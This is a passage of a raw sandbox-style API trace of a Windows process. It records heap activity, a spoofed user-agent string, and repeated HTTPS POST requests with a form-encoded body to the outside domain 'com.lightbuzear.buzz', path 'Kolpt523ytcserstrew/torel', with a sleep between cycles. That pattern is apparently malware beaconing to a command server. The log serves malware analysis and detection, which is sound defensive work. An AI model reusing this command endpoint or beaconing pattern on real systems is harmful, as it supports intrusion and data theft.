(HeapHandle=0x4780000, Flags=0x0, Size=0x2) returned 0x47ce710 [0203.584] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce5e0 | out: hHeap=0x4780000) returned 1 [0203.584] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x3) returned 0x47ce5a0 [0203.584] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce710 | out: hHeap=0x4780000) returned 1 [0203.584] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x4) returned 0x47ce6b0 [0203.584] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce5a0 | out: hHeap=0x4780000) returned 1 [0203.584] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x6) returned 0x47ce5e0 [0203.585] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce6b0 | out: hHeap=0x4780000) returned 1 [0203.585] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x9) returned 0x481fb20 [0203.585] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce5e0 | out: hHeap=0x4780000) returned 1 [0203.585] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0xd) returned 0x481f9a0 [0203.585] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x481fb20 | out: hHeap=0x4780000) returned 1 [0203.585] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x13) returned 0x480b590 [0203.585] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x481f9a0 | out: hHeap=0x4780000) returned 1 [0203.585] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x1c) returned 0x482a1e0 [0203.585] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x480b590 | out: hHeap=0x4780000) returned 1 [0203.585] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x2a) returned 0x47fbf28 [0203.585] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x482a1e0 | out: hHeap=0x4780000) returned 1 [0203.585] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x20) returned 0x4829e98 [0203.585] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x30) returned 0x47fbc50 [0203.585] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x20) returned 0x482a118 [0203.585] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47fbc50 | out: hHeap=0x4780000) returned 1 [0203.586] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47fbf28 | out: hHeap=0x4780000) returned 1 [0203.586] GetProcAddress (hModule=0x71780000, lpProcName="ObtainUserAgentString") returned 0x71852f30 [0203.586] ObtainUserAgentString (in: dwOption=0x0, pszUAOut=0xdf2f4, cbSize=0xde1cc | out: pszUAOut="Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)", cbSize=0xde1cc) returned 0x0 [0203.586] FreeLibrary (hLibModule=0x71780000) returned 1 [0203.587] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x482a118 | out: hHeap=0x4780000) returned 1 [0203.587] InternetOpenA (lpszAgent="Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)", dwAccessType=0x0, lpszProxy=0x0, lpszProxyBypass=0x0, dwFlags=0x0) returned 0xcc0004 [0203.587] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x20) returned 0x4829df8 [0203.587] InternetConnectA (hInternet=0xcc0004, lpszServerName="com.lightbuzear.buzz", nServerPort=0x1bb, lpszUserName=0x0, lpszPassword=0x0, dwService=0x3, dwFlags=0x0, dwContext=0x0) returned 0xcc0008 [0203.587] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x1) returned 0x47ce5a0 [0203.587] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x2) returned 0x47ce6d0 [0203.587] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce5a0 | out: hHeap=0x4780000) returned 1 [0203.587] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x3) returned 0x47ce690 [0203.587] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce6d0 | out: hHeap=0x4780000) returned 1 [0203.587] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x4) returned 0x47ce640 [0203.587] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce690 | out: hHeap=0x4780000) returned 1 [0203.587] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x6) returned 0x47ce5a0 [0203.587] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce640 | out: hHeap=0x4780000) returned 1 [0203.587] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x9) returned 0x481fa18 [0203.587] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce5a0 | out: hHeap=0x4780000) returned 1 [0203.587] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0xd) returned 0x481fb20 [0203.587] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x481fa18 | out: hHeap=0x4780000) returned 1 [0203.587] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x13) returned 0x480b590 [0203.587] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x481fb20 | out: hHeap=0x4780000) returned 1 [0203.588] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x10) returned 0x481fb20 [0203.588] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x20) returned 0x4829fb0 [0203.588] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x4829fb0 | out: hHeap=0x4780000) returned 1 [0203.588] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x480b590 | out: hHeap=0x4780000) returned 1 [0203.588] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x20) returned 0x482a0f0 [0203.588] LoadLibraryW (lpLibFileName="Wininet.dll") returned 0x71570000 [0203.588] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x20) returned 0x4829f10 [0203.657] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x1) returned 0x47ce570 [0203.657] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x2) returned 0x47ce6c0 [0203.657] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce570 | out: hHeap=0x4780000) returned 1 [0203.657] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x3) returned 0x47ce690 [0203.657] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce6c0 | out: hHeap=0x4780000) returned 1 [0203.657] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x4) returned 0x47ce630 [0203.657] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce690 | out: hHeap=0x4780000) returned 1 [0203.657] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x6) returned 0x47ce670 [0203.657] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce630 | out: hHeap=0x4780000) returned 1 [0203.657] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x9) returned 0x481fa18 [0203.657] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce670 | out: hHeap=0x4780000) returned 1 [0203.657] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0xd) returned 0x47cd8f0 [0203.657] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x481fa18 | out: hHeap=0x4780000) returned 1 [0203.657] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x13) returned 0x480b590 [0203.657] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47cd8f0 | out: hHeap=0x4780000) returned 1 [0203.657] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x10) returned 0x47cd8f0 [0203.657] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x20) returned 0x482a1b8 [0203.658] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x482a1b8 | out: hHeap=0x4780000) returned 1 [0203.658] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x480b590 | out: hHeap=0x4780000) returned 1 [0203.658] HttpOpenRequestA (hConnect=0xcc0008, lpszVerb="POST", lpszObjectName="Kolpt523ytcserstrew/torel", lpszVersion=0x0, lpszReferrer=0x0, lplpszAcceptTypes=0x0, dwFlags=0x800000, dwContext=0x0) returned 0xcc000c [0203.658] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x1) returned 0x47ce640 [0203.659] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x2) returned 0x47ce710 [0203.659] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce640 | out: hHeap=0x4780000) returned 1 [0203.659] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x3) returned 0x47ce5a0 [0203.659] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce710 | out: hHeap=0x4780000) returned 1 [0203.659] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x4) returned 0x47ce6d0 [0203.659] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce5a0 | out: hHeap=0x4780000) returned 1 [0203.659] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x6) returned 0x47ce5a0 [0203.659] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce6d0 | out: hHeap=0x4780000) returned 1 [0203.659] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x9) returned 0x482ebb0 [0203.659] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce5a0 | out: hHeap=0x4780000) returned 1 [0203.659] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0xd) returned 0x482ea18 [0203.659] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x482ebb0 | out: hHeap=0x4780000) returned 1 [0203.659] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x13) returned 0x480b5d0 [0203.659] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x482ea18 | out: hHeap=0x4780000) returned 1 [0203.659] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x1c) returned 0x482a050 [0203.659] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x480b5d0 | out: hHeap=0x4780000) returned 1 [0203.659] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x2a) returned 0x47fba20 [0203.659] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x482a050 | out: hHeap=0x4780000) returned 1 [0203.659] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x20) returned 0x482a118 [0203.659] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x30) returned 0x47fbc50 [0203.659] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x20) returned 0x4829fb0 [0203.660] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47fbc50 | out: hHeap=0x4780000) returned 1 [0203.660] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47fba20 | out: hHeap=0x4780000) returned 1 [0203.660] GetProcAddress (hModule=0x71570000, lpProcName="InternetSetOptionA") returned 0x71611dc0 [0203.660] InternetSetOptionA (hInternet=0xcc000c, dwOption=0x1f, lpBuffer=0xde1c8*, dwBufferLength=0x4) returned 1 [0203.661] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x4829fb0 | out: hHeap=0x4780000) returned 1 [0203.661] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x1) returned 0x47ce5c0 [0203.661] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x2) returned 0x47ce730 [0203.661] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce5c0 | out: hHeap=0x4780000) returned 1 [0203.661] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x3) returned 0x47ce610 [0203.661] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce730 | out: hHeap=0x4780000) returned 1 [0203.661] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x4) returned 0x47ce730 [0203.661] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce610 | out: hHeap=0x4780000) returned 1 [0203.661] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x6) returned 0x47ce710 [0203.661] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce730 | out: hHeap=0x4780000) returned 1 [0203.661] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x9) returned 0x482eaf0 [0203.661] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce710 | out: hHeap=0x4780000) returned 1 [0203.661] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0xd) returned 0x482ea30 [0203.661] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x482eaf0 | out: hHeap=0x4780000) returned 1 [0203.661] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x13) returned 0x480b5d0 [0203.661] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x482ea30 | out: hHeap=0x4780000) returned 1 [0203.661] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x1c) returned 0x4829fb0 [0203.661] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x480b5d0 | out: hHeap=0x4780000) returned 1 [0203.661] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x2a) returned 0x47fb898 [0203.661] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x4829fb0 | out: hHeap=0x4780000) returned 1 [0203.661] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x20) returned 0x4829f38 [0203.661] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x30) returned 0x47fbc50 [0203.661] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x20) returned 0x4829d08 [0203.662] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47fbc50 | out: hHeap=0x4780000) returned 1 [0203.662] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47fb898 | out: hHeap=0x4780000) returned 1 [0203.662] GetProcAddress (hModule=0x71570000, lpProcName="HttpSendRequestA") returned 0x71638e60 [0203.662] HttpSendRequestA (hRequest=0xcc000c, lpszHeaders="Content-Type:application/x-www-form-urlencoded", dwHeadersLength=0x2e, lpOptional=0x47a6f78*, dwOptionalLength=0x4b2) returned 1 [0205.296] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x4829d08 | out: hHeap=0x4780000) returned 1 [0205.296] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x4) returned 0x47ce570 [0205.296] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x4) returned 0x47ce620 [0205.297] GetModuleHandleA (lpModuleName="Wininet.dll") returned 0x71570000 [0205.297] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x1) returned 0x47ce610 [0205.297] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x2) returned 0x47ce5e0 [0205.297] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce610 | out: hHeap=0x4780000) returned 1 [0205.297] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x3) returned 0x47ce710 [0205.297] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce5e0 | out: hHeap=0x4780000) returned 1 [0205.297] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x4) returned 0x47ce6d0 [0205.297] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce710 | out: hHeap=0x4780000) returned 1 [0205.297] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x6) returned 0x47ce5e0 [0205.297] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce6d0 | out: hHeap=0x4780000) returned 1 [0205.297] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x9) returned 0x482eaa8 [0205.297] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce5e0 | out: hHeap=0x4780000) returned 1 [0205.297] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0xd) returned 0x482eb20 [0205.297] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x482eaa8 | out: hHeap=0x4780000) returned 1 [0205.297] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x13) returned 0x480b5d0 [0205.298] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x482eb20 | out: hHeap=0x4780000) returned 1 [0205.298] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x1c) returned 0x4829fb0 [0205.298] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x480b5d0 | out: hHeap=0x4780000) returned 1 [0205.298] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x2a) returned 0x47fba20 [0205.298] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x4829fb0 | out: hHeap=0x4780000) returned 1 [0205.298] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x20) returned 0x482a000 [0205.298] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x30) returned 0x47fbc50 [0205.298] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x20) returned 0x482a028 [0205.298] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47fbc50 | out: hHeap=0x4780000) returned 1 [0205.298] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47fba20 | out: hHeap=0x4780000) returned 1 [0205.299] GetProcAddress (hModule=0x71570000, lpProcName="InternetReadFile") returned 0x715f7320 [0205.299] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0xde2f4, dwNumberOfBytesToRead=0x400, lpdwNumberOfBytesRead=0xde290 | out: lpBuffer=0xde2f4*, lpdwNumberOfBytesRead=0xde290*=0x5) returned 1 [0205.299] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x482a028 | out: hHeap=0x4780000) returned 1 [0205.299] GetModuleHandleA (lpModuleName="Wininet.dll") returned 0x71570000 [0205.299] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x1) returned 0x47ce710 [0205.299] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x2) returned 0x47ce5e0 [0205.299] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce710 | out: hHeap=0x4780000) returned 1 [0205.300] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x3) returned 0x47ce6c0 [0205.300] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce5e0 | out: hHeap=0x4780000) returned 1 [0205.300] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x4) returned 0x47ce6e0 [0205.300] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce6c0 | out: hHeap=0x4780000) returned 1 [0205.300] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x6) returned 0x47ce740 [0205.300] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce6e0 | out: hHeap=0x4780000) returned 1 [0205.300] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x9) returned 0x482ea30 [0205.300] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce740 | out: hHeap=0x4780000) returned 1 [0205.300] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0xd) returned 0x482ece8 [0205.300] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x482ea30 | out: hHeap=0x4780000) returned 1 [0205.300] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x13) returned 0x480b5d0 [0205.300] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x482ece8 | out: hHeap=0x4780000) returned 1 [0205.300] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x1c) returned 0x482a1b8 [0205.300] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x480b5d0 | out: hHeap=0x4780000) returned 1 [0205.300] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x2a) returned 0x47fbc50 [0205.300] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x482a1b8 | out: hHeap=0x4780000) returned 1 [0205.300] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x20) returned 0x482a168 [0205.300] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x30) returned 0x47fba20 [0205.300] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x20) returned 0x4829d30 [0205.301] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47fba20 | out: hHeap=0x4780000) returned 1 [0205.301] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47fbc50 | out: hHeap=0x4780000) returned 1 [0205.301] GetProcAddress (hModule=0x71570000, lpProcName="InternetReadFile") returned 0x715f7320 [0205.301] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0xde2f4, dwNumberOfBytesToRead=0x400, lpdwNumberOfBytesRead=0xde290 | out: lpBuffer=0xde2f4*, lpdwNumberOfBytesRead=0xde290*=0x0) returned 1 [0205.302] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x4829d30 | out: hHeap=0x4780000) returned 1 [0205.302] InternetCloseHandle (hInternet=0xcc000c) returned 1 [0205.302] InternetCloseHandle (hInternet=0xcc0008) returned 1 [0205.302] InternetCloseHandle (hInternet=0xcc0004) returned 1 [0205.302] FreeLibrary (hLibModule=0x71570000) returned 1 [0205.302] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce620 | out: hHeap=0x4780000) returned 1 [0205.302] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce570 | out: hHeap=0x4780000) returned 1 [0205.302] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x4829f10 | out: hHeap=0x4780000) returned 1 [0205.303] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x482a0f0 | out: hHeap=0x4780000) returned 1 [0205.303] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x4829df8 | out: hHeap=0x4780000) returned 1 [0205.303] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x482a190 | out: hHeap=0x4780000) returned 1 [0205.303] Sleep (dwMilliseconds=0x2710) [0205.501] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x1) returned 0x47ce570 [0205.501] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x2) returned 0x47ce6e0 [0205.501] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce570 | out: hHeap=0x4780000) returned 1 [0205.501] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x3) returned 0x47ce630 [0205.501] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce6e0 | out: hHeap=0x4780000) returned 1 [0205.501] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x4) returned 0x47ce600 [0205.501] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce630 | out: hHeap=0x4780000) returned 1 [0205.501] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x6) returned 0x47ce610 [0205.501] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce600 | out: hHeap=0x4780000) returned 1 [0205.501] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x9) returned 0x481f9a0 [0205.501] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce610 | out: hHeap=0x4780000) returned 1 [0205.501] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0xd) returned 0x481fa18 [0205.502] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x481f9a0 | out: hHeap=0x4780000) returned 1 [0205.502] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x13) returned 0x480b4d0 [0205.502] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x481fa18 | out: hHeap=0x4780000) returned 1 [0205.509] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x10) returned 0x481fa18 [0205.509] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x20) returned 0x4829f10 [0205.510] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x4829f10 | out: hHeap=0x4780000) returned 1 [0205.510] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x480b4d0 | out: hHeap=0x4780000) returned 1 [0205.510] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x20) returned 0x4829f10 [0205.510] LoadLibraryW (lpLibFileName="Urlmon.dll") returned 0x71780000 [0205.564] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x1) returned 0x47ce690 [0205.564] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x2) returned 0x47ce670 [0205.564] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce690 | out: hHeap=0x4780000) returned 1 [0205.564] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x3) returned 0x47ce600 [0205.564] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce670 | out: hHeap=0x4780000) returned 1 [0205.564] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x4) returned 0x47ce6c0 [0205.564] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce600 | out: hHeap=0x4780000) returned 1 [0205.564] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x6) returned 0x47ce570 [0205.564] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce6c0 | out: hHeap=0x4780000) returned 1 [0205.565] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x9) returned 0x481f9a0 [0205.565] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce570 | out: hHeap=0x4780000) returned 1 [0205.565] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0xd) returned 0x47f4708 [0205.565] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x481f9a0 | out: hHeap=0x4780000) returned 1 [0205.565] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x13) returned 0x480b4d0 [0205.565] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47f4708 | out: hHeap=0x4780000) returned 1 [0205.565] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x1c) returned 0x4829d58 [0205.565] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x480b4d0 | out: hHeap=0x4780000) returned 1 [0205.565] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x2a) returned 0x47fb908 [0205.565] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x4829d58 | out: hHeap=0x4780000) returned 1 [0205.565] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x20) returned 0x4829df8 [0205.565] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x30) returned 0x47fbc50 [0205.565] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x20) returned 0x482a0f0 [0205.565] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47fbc50 | out: hHeap=0x4780000) returned 1 [0205.566] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47fb908 | out: hHeap=0x4780000) returned 1 [0205.566] GetProcAddress (hModule=0x71780000, lpProcName="ObtainUserAgentString") returned 0x71852f30 [0205.566] ObtainUserAgentString (in: dwOption=0x0, pszUAOut=0xdf2f4, cbSize=0xde1cc | out: pszUAOut="Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; WOW64; 